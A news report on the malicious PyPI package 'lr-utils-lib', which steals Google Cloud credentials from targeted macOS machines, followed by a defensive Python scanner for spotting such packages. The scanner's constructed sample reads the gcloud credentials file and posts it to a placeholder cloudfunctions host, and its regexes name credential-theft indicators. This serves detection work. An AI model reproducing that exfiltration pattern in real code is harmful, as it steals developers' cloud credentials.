Cybersecurity researchers have found a malicious package on the Python Package Index (PyPI) repository that targets Apple macOS systems with the goal of stealing users' Google Cloud credentials from a narrow pool of victims.
The package, named "lr-utils-lib," attracted a total of 59 downloads before it was taken down. It was uploaded to the registry in early June 2024.
"The malware uses a list of predefined hashes to target specific macOS machines and attempts to harvest Google Cloud authentication data," Checkmarx researcher Yehuda Gelb said in a Friday report. "The harvested credentials are sent to a remote server."
An important aspect of the package is that it first checks whether it has been installed on a macOS system, and only then proceeds to compare the system's Universally Unique Identifier (UUID) against a hard-coded list of 64 hashes.
If the compromised machine is among those specified in the predefined set, it attempts to access two files, namely application_default_credentials.json and credentials.db, located in the ~/.config/gcloud directory, which contain Google Cloud authentication data.
The captured information is then transmitted over HTTP to a remote server, "europe-west2-workload-422915[.]cloudfunctions[.]net."
Checkmarx said it also found a fake profile on LinkedIn with the name "Lucid Zenith" that matched the package's owner and falsely claimed to be the CEO of Apex Companies, suggesting a possible social engineering element to the attack.
Exactly who is behind the campaign is currently not known. However, it comes more than two months after cybersecurity firm Phylum disclosed details of another supply chain attack involving a Python package called "requests-darwin-lite" that was also found to unleash its malicious actions after checking the UUID of the macOS host.
These campaigns are a sign that threat actors have prior knowledge of the macOS systems they want to infiltrate and are going to great lengths to ensure that the malicious packages are distributed only to those particular machines.
It also speaks to the tactics malicious actors employ to distribute lookalike packages, aiming to deceive developers into incorporating them into their applications.
"While it's not clear whether this attack targeted individuals or enterprises, these kinds of attacks can significantly impact enterprises," Gelb said. "While the initial compromise usually occurs on an individual developer's machine, the implications for enterprises can be substantial."
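As an added illustration of how a defender might triage a package for the behaviour described above (example code written for this article, not Checkmarx's tooling and not the package's own code), the heuristic scanner below flags source text that combines a macOS platform check, a hardware-UUID lookup, a hash comparison, reads of the gcloud credential files named above, and an outbound call to a cloudfunctions.net endpoint. The indicator weights, the threshold and the two sample fragments are assumptions constructed for this example.

```python
import re
from dataclasses import dataclass, field

# Indicator name -> (regex over package source text, weight). Weights and the
# threshold below are assumptions chosen for this example, not published figures.
INDICATORS = {
    "macos_platform_check":    (r"sys\.platform|platform\.system\(\)", 1),
    "hardware_uuid_lookup":    (r"IOPlatformUUID|ioreg", 2),
    "hash_allowlist_gate":     (r"hashlib\.(sha256|sha1|md5)\(", 1),
    "gcloud_credential_files": (r"application_default_credentials\.json|credentials\.db|\.config/gcloud", 3),
    "cloudfunctions_callout":  (r"cloudfunctions\.net", 2),
}

@dataclass
class Finding:
    score: int = 0
    hits: list = field(default_factory=list)

def triage_source(text: str) -> Finding:
    """Score one file's source text against the indicator table."""
    finding = Finding()
    for name, (pattern, weight) in INDICATORS.items():
        if re.search(pattern, text):
            finding.hits.append(name)
            finding.score += weight
    return finding

def is_suspicious(finding: Finding, threshold: int = 5) -> bool:
    """A single indicator (e.g. a platform check) is normal; the combination is not."""
    return finding.score >= threshold

# Constructed fragment echoing the gating described in the article (not the real package code).
SAMPLE_SUSPICIOUS = '''
if sys.platform == "darwin":
    uuid = hardware_uuid()  # read from ioreg's IOPlatformUUID
    if hashlib.sha256(uuid.encode()).hexdigest() in TARGET_HASHES:
        path = os.path.expanduser("~/.config/gcloud/application_default_credentials.json")
        requests.post("https://PLACEHOLDER.cloudfunctions.net/PLACEHOLDER", data=open(path).read())
'''
# Constructed benign fragment: a platform check alone should not trigger.
SAMPLE_BENIGN = '''
if sys.platform == "darwin":
    extra_flags.append("-framework CoreFoundation")
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        f = triage_source(src)
        print(label, f.score, f.hits, "FLAG" if is_suspicious(f) else "ok")
```

Run over every .py file in an unpacked sdist or wheel (setup.py and __init__.py first, since install-time hooks are where such gating usually sits) and review anything that crosses the threshold by hand; the weights are a starting point, not a verdict.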